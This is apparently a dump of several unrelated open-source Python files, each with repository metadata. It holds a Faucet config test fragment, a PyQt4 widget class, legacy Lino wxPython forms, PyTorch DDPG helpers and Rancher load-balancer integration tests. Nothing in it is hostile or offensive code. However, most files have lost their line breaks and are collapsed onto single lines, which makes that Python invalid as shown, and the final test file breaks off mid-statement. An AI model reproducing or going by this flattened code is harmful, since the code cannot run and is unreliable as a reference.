native_vlan: 0x100 """ def setUp(self): """Setup basic port and vlan config with hardware type set""" self.setup_valves(self.CONFIG) def test_config_applied_update(self): """Verify that config_applied increments after DP connect""" # 100% for a single datapath self.assertEqual(self.get_prom('faucet_config_applied', bare=True), 1.0) # Add a second datapath, which currently isn't programmed self.CONFIG += """ s2: dp_id: 0x2 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ self.update_config(self.CONFIG, reload_expected=False) # Should be 50% self.assertEqual(self.get_prom('faucet_config_applied', bare=True), .5) # We don't have a way to simulate the second datapath connecting, # we update the statistic manually self.valves_manager.update_config_applied({0x2: True}) # Should be 100% now self.assertEqual(self.get_prom('faucet_config_applied', bare=True), 1.0) def test_description_only(self): """Test updating config description""" self.update_config(self.NEW_DESCR_CONFIG, reload_expected=False) class ValveReloadConfigTestCase(ValveTestBases.ValveTestBig): # pylint: disable=too-few-public-methods """Repeats the tests after a config reload.""" 
def setUp(self): super().setUp() self.flap_port(1) self.update_config(CONFIG, reload_type='warm', reload_expected=False) if __name__ == "__main__": unittest.main() # pytype: disable=module-attr
REANNZ/faucet
tests/unit/faucet/test_valve_config.py
Python
apache-2.0
36,835
# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file '/data/Public/qt-learning/ui/widgets/integer3Attr.ui'
#
# Created: Tue Nov 14 18:49:58 2017
#      by: PyQt4 UI code generator 4.6.2
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui


class Ui_Widget(object):
    def setupUi(self, Widget):
        Widget.setObjectName("Widget")
        Widget.resize(402, 20)
        self.horizontalLayout = QtGui.QHBoxLayout(Widget)
        self.horizontalLayout.setSpacing(3)
        self.horizontalLayout.setMargin(3)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.label = QtGui.QLabel(Widget)
        self.label.setObjectName("label")
        self.horizontalLayout.addWidget(self.label)
        self.spinBox_1 = QtGui.QSpinBox(Widget)
        self.spinBox_1.setObjectName("spinBox_1")
        self.horizontalLayout.addWidget(self.spinBox_1)
        self.spinBox_2 = QtGui.QSpinBox(Widget)
        self.spinBox_2.setObjectName("spinBox_2")
        self.horizontalLayout.addWidget(self.spinBox_2)
        self.spinBox_3 = QtGui.QSpinBox(Widget)
        self.spinBox_3.setObjectName("spinBox_3")
        self.horizontalLayout.addWidget(self.spinBox_3)
        spacerItem = QtGui.QSpacerItem(237, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)

        self.retranslateUi(Widget)
        QtCore.QMetaObject.connectSlotsByName(Widget)

    def retranslateUi(self, Widget):
        Widget.setWindowTitle(QtGui.QApplication.translate("Widget", "Form", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("Widget", "Text", None, QtGui.QApplication.UnicodeUTF8))
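# --- Illustrative usage sketch (not part of the generated file) ---
# Standard pattern for attaching a pyuic-generated class to a live widget.
if __name__ == "__main__":
    import sys

    app = QtGui.QApplication(sys.argv)
    widget = QtGui.QWidget()
    ui = Ui_Widget()
    ui.setupUi(widget)  # builds the label and the three spin boxes
    widget.show()
    sys.exit(app.exec_())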
david-cattermole/qt-learning
python/qtLearn/widgets/ui_integer3Attr.py
Python
bsd-3-clause
1,747
raise "not used" ## Copyright 2003-2005 Luc Saffre ## This file is part of the Lino project. ## Lino is free software; you can redistribute it and/or modify it ## under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## Lino is distributed in the hope that it will be useful, but WITHOUT ## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY ## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public ## License for more details. ## You should have received a copy of the GNU General Public License ## along with Lino; if not, write to the Free Software Foundation, ## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA import wx import os from lino.adamo.widgets import Action from lino.adamo.datasource import DataCell from lino.adamo import center from lino.adamo.session import Session from gridframe import RptFrame class EventCaller(Action): "ignores the event" def __init__(self,form,meth,*args,**kw): self._form = form Action.__init__(self,meth,*args,**kw) def __call__(self,evt): #self._form.getSession().notifyMessage("%s called %s." % ( # str(evt), str(self))) self.execute() class wxDataCell(DataCell): def makeEditor(self,parent): self.editor = wx.TextCtrl(parent,-1,self.format()) #self.Bind(wx.EVT_TEXT, self.EvtText, t1) #editor.Bind(wx.EVT_CHAR, self.EvtChar) #editor.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus) self.editor.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus) #editor.Bind(wx.EVT_WINDOW_DESTROY, self.OnWindowDestroy) return self.editor def OnKillFocus(self,evt): v = self.editor.GetValue() if len(v) == 0: v = None self.col.setCellValue(self.row,v) evt.Skip() class FormFrame(wx.Frame): # overviewText = "wxPython Overview" def __init__(self, form): print "FormFrame.__init__()" #self.ui = ui title = form.getLabel() #title = self.session.db.getLabel() #parent = form.getSession().getCurrentForm() parent = None wx.Frame.__init__(self, parent, -1, title, size = (400, 300), style=wx.DEFAULT_FRAME_STYLE| wx.NO_FULL_REPAINT_ON_RESIZE) wx.EVT_IDLE(self, self.OnIdle) wx.EVT_CLOSE(self, self.OnCloseWindow) wx.EVT_ICONIZE(self, self.OnIconfiy) wx.EVT_MAXIMIZE(self, self.OnMaximize) self.Centre(wx.BOTH) self.CreateStatusBar(1, wx.ST_SIZEGRIP) self.setForm(form) self.Show() def setForm(self,form): self.form = form if len(form.getMenus()) != 0: wxMenuBar = wx.MenuBar() for mnu in self.form.getMenus(): wxm = self._createMenuWidget(mnu) wxMenuBar.Append(wxm,mnu.getLabel()) self.SetMenuBar(wxMenuBar) db = self.form.getSession().db self.SetTitle(db.getLabel() +" - " \ + self.form.getLabel().replace(db.schema.HK_CHAR, '')) #self.SetBackgroundColour(wx.RED) if len(form) > 0: fieldsPanel = wx.Panel(self,-1) vbox = wx.BoxSizer(wx.VERTICAL) for cell in form: p = wx.Panel(fieldsPanel,-1) vbox.Add(p) hbox = wx.BoxSizer(wx.HORIZONTAL) label = wx.StaticText(p, -1, cell.col.rowAttr.getLabel()) #label.SetBackgroundColour(wx.GREEN) hbox.Add(label, 1, wx.ALL,10) editor = cell.makeEditor(p) hbox.Add(editor, 1, wx.ALL,10) p.SetSizer(hbox) fieldsPanel.SetSizer( vbox ) vbox = wx.BoxSizer(wx.VERTICAL) vbox.Add(fieldsPanel,1,wx.EXPAND|wx.ALL,10) buttons = form.getButtons() if len(buttons): buttonPanel = wx.Panel(self,-1) hbox = wx.BoxSizer(wx.HORIZONTAL) for (name,meth) in buttons: winId = wx.NewId() button = wx.Button(buttonPanel,winId,name, wx.DefaultPosition, wx.DefaultSize) hbox.Add(button, 1, wx.ALL,10) wx.EVT_BUTTON(self, winId, EventCaller(form,meth)) 
buttonPanel.SetSizer(hbox) hbox.Fit(fieldsPanel) vbox.Add(buttonPanel,1,wx.EXPAND|wx.ALL,10) self.SetAutoLayout( True ) # tell dialog to use sizer self.SetSizer( vbox ) # actually set the sizer vbox.Fit( self ) # set size to minimum size as calculated by the sizer #vbox.SetSizeHints( self ) # set size hints to honour mininum size self.Layout() def _createMenuWidget(self,mnu): wxMenu = wx.Menu() for mi in mnu.getItems(): #print repr(mi.getLabel()) #"%s must be a String" % repr(mi.getLabel()) winId = wx.NewId() doc = mi.getDoc() if doc is None: doc="" assert type(doc) == type(""),\ repr(mi) assert type(mi.getLabel()) == type(""),\ repr(mi) wxMenu.Append(winId,mi.getLabel(),doc) wx.EVT_MENU(self, winId, EventCaller(self.form, mi.execute)) return wxMenu def OnCloseWindow(self, event): self.dying = True #self.window = None self.mainMenu = None #if hasattr(self, "tbicon"): # del self.tbicon self.Destroy() def OnIdle(self, evt): #wx.LogMessage("OnIdle") evt.Skip() def OnIconfiy(self, evt): wx.LogMessage("OnIconfiy") evt.Skip() def OnMaximize(self, evt): wx.LogMessage("OnMaximize") evt.Skip() class WxSession(Session): _dataCellFactory = wxDataCell def error(self,*a): return center.center().console.error(*a) def debug(self,*a): return center.center().console.debug(*a) def info(self,*a): return center.center().console.info(*a) def showForm(self,formName,modal=False,**kw): frm = self.openForm(formName,**kw) frame = FormFrame(frm) ## if modal: ## frame.showModal() ## else: ## frame.show() def showReport(self,ds,showTitle=True,**kw): frame = RptFrame(None,-1,ds) frame.Show() class WxApp(wx.App): def __init__(self,rootSession): #center.center().setSessionFactory(WxSession) #self.session = rootSession.spawn() #rootSession.end() self.session = WxSession(db=rootSession.db, langs=rootSession.getLangs()) wx.App.__init__(self,0) def OnInit(self): wx.InitAllImageHandlers() self.session.onBeginSession() ## self.session.onStartUI() ## frame = self.session.getCurrentForm() # forms.login ## #assert frame is not None ## #print frame ## #frame = FormFrame(None, -1, form) ## self.SetTopWindow(frame) return True def OnExit(self): self.session.shutdown() ## class wxApplication(Application): ## def __init__(self,**kw): ## Application.__init__(self,**kw) ## self.wxapp = wxAppInstance(self) ## def createSession(self,**kw): ## return wxSession(self,**kw) ## def run(self): ## self.wxapp.MainLoop()
MaxTyutyunnikov/lino
obsolete/src/lino/formsold/wx/main.py
Python
gpl-3.0
7,865
import os import torch from torch.autograd import Variable USE_CUDA = torch.cuda.is_available() FLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor def prRed(prt): print("\033[91m {}\033[00m" .format(prt)) def prGreen(prt): print("\033[92m {}\033[00m" .format(prt)) def prYellow(prt): print("\033[93m {}\033[00m" .format(prt)) def prLightPurple(prt): print("\033[94m {}\033[00m" .format(prt)) def prPurple(prt): print("\033[95m {}\033[00m" .format(prt)) def prCyan(prt): print("\033[96m {}\033[00m" .format(prt)) def prLightGray(prt): print("\033[97m {}\033[00m" .format(prt)) def prBlack(prt): print("\033[98m {}\033[00m" .format(prt)) def to_numpy(var): return var.cpu().data.numpy() if USE_CUDA else var.data.numpy() def to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT): return Variable( torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad ).type(dtype) def soft_update(target, source, tau): for target_param, param in zip(target.parameters(), source.parameters()): target_param.data.copy_( target_param.data * (1.0 - tau) + param.data * tau ) def hard_update(target, source): for target_param, param in zip(target.parameters(), source.parameters()): target_param.data.copy_(param.data) def get_output_folder(parent_dir, env_name): """Return save folder. Assumes folders in the parent_dir have suffix -run{run number}. Finds the highest run number and sets the output folder to that number + 1. This is just convenient so that if you run the same script multiple times tensorboard can plot all of the results on the same plots with different names. Parameters ---------- parent_dir: str Path of the directory containing all experiment runs. Returns ------- parent_dir/run_dir Path to this run's save directory. """ os.makedirs(parent_dir, exist_ok=True) experiment_id = 0 for folder_name in os.listdir(parent_dir): if not os.path.isdir(os.path.join(parent_dir, folder_name)): continue try: folder_name = int(folder_name.split('-run')[-1]) if folder_name > experiment_id: experiment_id = folder_name except: pass experiment_id += 1 parent_dir = os.path.join(parent_dir, env_name) parent_dir = parent_dir + '-run{}'.format(experiment_id) os.makedirs(parent_dir, exist_ok=True) return parent_dir
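# Editor's note (not part of the original file): a minimal usage sketch for the
# helpers above, assuming this module is importable as `util` (matching its path).
# The layer sizes, tau value and environment name are illustrative placeholders.
import torch.nn as nn

from util import get_output_folder, hard_update, soft_update

actor = nn.Linear(4, 2)           # stand-in for a policy network
actor_target = nn.Linear(4, 2)    # its target copy

hard_update(actor_target, actor)            # start from identical weights
soft_update(actor_target, actor, tau=0.01)  # then let the target slowly track the source

run_dir = get_output_folder("output", "Pendulum-v0")  # creates e.g. output/Pendulum-v0-run1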
ghliu/pytorch-ddpg
util.py
Python
apache-2.0
2,518
from common_fixtures import * # NOQA LB_IMAGE_UUID = "docker:sangeetha/lbtest:latest" CONTAINER_HOST_NAMES = ["container1", "container2", "container3"] containers_in_host = [] logger = logging.getLogger(__name__) @pytest.fixture(scope='session', autouse=True) def lb_targets(request, client): hosts = client.list_host(kind='docker', removed_null=True, state="active") assert len(hosts) > 1, "Need at least 2 hosts for executing Lb test cases" for n in range(0, 2): con_name = random_str() con1 = client.create_container(name=con_name, networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[n] }, requestedHostId=hosts[n].id ) con1 = client.wait_success(con1, timeout=180) containers_in_host.append(con1) def fin(): to_delete_con = [] for c in containers_in_host: if c.state in ("running" or "stopped"): to_delete_con.append(c) delete_all(client, to_delete_con) to_delete_lb = [] for i in client.list_loadBalancer(state='active'): try: if i.name.startswith('test-'): to_delete_lb.append(i) except AttributeError: pass delete_all(client, to_delete_lb) to_delete_lb_config = [] for i in client.list_loadBalancerConfig(state='active'): try: if i.name.startswith('test-'): to_delete_lb_config.append(i) except AttributeError: pass delete_all(client, to_delete_lb_config) to_delete_lb_listener = [] for i in client.list_loadBalancerListener(state='active'): try: if i.name.startswith('test-'): to_delete_lb_listener.append(i) except AttributeError: pass delete_all(client, to_delete_lb_listener) request.addfinalizer(fin) def create_lb_for_container_lifecycle(client, host, port): lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) return lb, con1 def create_lb_with_one_listener_one_host_two_targets(client, host, port, lb_config=None, lb_config_params=None, listener_algorithm=None, containers=None): """ This method creates a LB rule. Adds the host that is passed to LB. Adds targets to the host. These targets are the containers parameter if passed, else shared containers are used. If lb_config is not passed , a new LB configuration is created which has a Lb listener with listener_algorithm if it is provided.If listener_algorithm is not provided , then it gets defaulted to round_robin. If lb_config is passed , this LB configuration is used for the LB rule. If listener_algorithm parameter is passed , listener gets created with default listener algorithm(round robin). 
""" listener_config = {"name": random_str(), "sourcePort": port, "targetPort": '80', "sourceProtocol": 'http', "targetProtocol": 'http' } if listener_algorithm is not None: listener_config["algorithm"] = listener_algorithm if lb_config is None: # Create Listener listener = client.create_loadBalancerListener(**listener_config) listener = client.wait_success(listener) # Create LB Config if lb_config_params is not None: lb_config = client.create_loadBalancerConfig(name=random_str(), **lb_config_params) else: lb_config = client.create_loadBalancerConfig(name=random_str()) lb_config = client.wait_success(lb_config) lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) # Create LB lb = client.create_loadBalancer(name=random_str(), loadBalancerConfigId=lb_config.id) lb = client.wait_success(lb) assert lb.state == "active" # Add host to LB lb = lb.addhost(hostId=host.id) validate_add_host(client, host, lb) # Add container to LB if containers is None: # Add default containers to LB for n in range(0, 2): lb = lb.addtarget(instanceId=containers_in_host[n].id) validate_add_target(client, containers_in_host[n], lb) else: for container in containers: lb = lb.addtarget(instanceId=container.id) validate_add_target(client, container, lb) if lb_config_params is None and listener_algorithm is None \ and containers is None: con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) return lb, lb_config def test_lb_with_targets(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8081" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, "8081") delete_all(client, [lb]) def test_lb_add_host_target_in_parallel(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9081" listener_config = {"name": random_str(), "sourcePort": port, "targetPort": '80', "sourceProtocol": 'http', "targetProtocol": 'http' } listener = client.create_loadBalancerListener(**listener_config) listener = client.wait_success(listener) lb_config = client.create_loadBalancerConfig(name=random_str()) listener = client.wait_success(listener) lb = client.create_loadBalancer(name=random_str(), loadBalancerConfigId=lb_config.id) lb = client.wait_success(lb) assert lb.state == "active" # Add host to LB , container to LB and listener to Lb config associated # with LB in parallel lb = lb.addhost(hostId=host.id) for n in range(0, 2): lb = lb.addtarget(instanceId=containers_in_host[n].id) lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) validate_add_host(client, host, lb) for n in range(0, 2): validate_add_target(client, containers_in_host[n], lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb]) def test_lb_add_target(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8082" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) # Add 
target to existing LB lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) logger.info("Check LB access after adding target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_remove_target(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8083" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) # Add target to existing LB lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) logger.info("Check LB access after adding target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) # Remove target to existing LB lb = lb.removetarget(instanceId=con1.id) validate_remove_target(client, con1, lb) logger.info("Check LB access after removing target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_add_listener(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "8084" port2 = "8085" logger.info("Create LB for 2 targets on port - " + port1) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port1) # Create Listener listener = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener = client.wait_success(listener) # Add listener to LB config which is associated to LB lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) logger.info("Check LB access after adding listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port2) delete_all(client, [lb]) def test_lb_remove_listener(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "8086" port2 = "8087" logger.info("Create LB for 2 targets on port - " + port1) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port1) # Create Listener listener = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener = client.wait_success(listener) # Add listener to LB config which is associated to LB lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) logger.info("Check LB access after adding listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port2) # Remove listener to LB config which is associated to LB lb_config = lb_config.removelistener(loadBalancerListenerId=listener.id) validate_remove_listener(client, 
listener, lb_config) logger.info("Check LB access after removing listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) check_no_access(host, port2) delete_all(client, [lb]) def test_lb_add_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8088" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Add host to existing LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) delete_all(client, [lb]) def test_lb_remove_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8089" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Add host to LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) # Remove host to LB lb = lb.removehost(hostId=host2.id) validate_remove_host(client, host2, lb) logger.info("Check LB access after removing host: " + host.id) check_round_robin_access(con_hostname, host, port) # Check no access on host2 - TBD check_no_access(host2, port) # Add host to LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) delete_all(client, [lb]) def test_lb_container_lifecycle_stop_start(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9090" logger.info("Create LB for 2 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Stop container con1 = client.wait_success(con1.stop()) assert con1.state == 'stopped' logger.info("Check LB access after stopping container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) # Start Container con1 = client.wait_success(con1.start()) assert con1.state == 'running' logger.info("Check LB access after starting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_container_lifecycle_restart(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9091" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Restart Container con1 = client.wait_success(con1.restart()) assert con1.state == 'running' logger.info( "Check LB access after restarting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) @pytest.mark.skipif(True, reason='not implemented yet') def 
test_lb_container_lifecycle_delete_restore(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9092" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Delete Container con1 = client.wait_success(client.delete(con1)) assert con1.state == 'removed' logger.info("Check LB access after deleting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) # Restore Container con1 = client.wait_success(con1.restore()) assert con1.state == 'stopped' con1 = client.wait_success(con1.start()) assert con1.state == 'running' logger.info("Check LB access after restoring container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_container_lifecycle_delete_purge(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9093" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Delete Container and purge it con1 = client.wait_success(client.delete(con1)) assert con1.state == 'removed' con1 = client.wait_success(con1.purge()) logger.info("Check LB access after purging container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=con1.id) assert len(target_maps) == 1 target_map = target_maps[0] target_map = wait_for_condition(client, target_map, lambda x: x.state == 'removed', lambda x: 'State is: ' + x.state) assert target_map.state == "removed" delete_all(client, [lb]) def test_lb_add_target_in_different_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8091" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host2.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_config_shared_by_2_lb_instances(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8092" logger.info("Create LB for 2 targets on port - " + port) lb1, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Create another LB using the same the Lb configuration lb2, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host2, port, lb_config) delete_all(client, [lb1, lb2]) def test_modify_lb_config_shared_by_2_lb_instances(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host1 = hosts[0] host2 = hosts[1] port1 = "8093" port2 = "8094" logger.info("Create LB for 2 targets on port - " + port1 + "- host-" + str(host1.id)) # Create LB - LB1 lb1, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host1, port1) logger.info("Create LB for 2 
targets on port - " + port1 + "- host-" + str(host2.id)) # Create another LB - LB2 using the same the Lb configuration lb2, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host2, port1, lb_config) # Add new listener to existing LB configuration that is attached to 2 LBs. listener1 = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener1 = client.wait_success(listener1) # Add listener to lB config lb_config = lb_config.addlistener(loadBalancerListenerId=listener1.id) validate_add_listener(client, listener1, lb_config) # Check is new listener is associated with LB1 con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port2) # Check is new listener is associated with LB2 con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port2) # Remove listener from lB config lb_config = lb_config.removelistener(loadBalancerListenerId=listener1.id) validate_remove_listener(client, listener1, lb_config) # Check if removed listener is not associated with LB1 anymore con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port1) check_no_access(host1, port2) # Check if removed listener is not associated with LB2 anymore con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port1) check_no_access(host2, port2) delete_all(client, [lb1, lb2]) def test_reuse_port_after_lb_deletion(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9000" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) lb = client.wait_success(client.delete(lb)) assert lb.state == 'removed' lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_for_container_with_port_mapping(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "9002" con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[0] }, ports=[port1+":80/tcp"], requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) port2 = "9003" con2 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[1] }, ports=[port2+":80/tcp"], requestedHostId=host.id ) con2 = client.wait_success(con2, timeout=180) port = "9001" logger.info("Create LB for 2 targets which have port " "mappings on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Check LB rule works con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, 
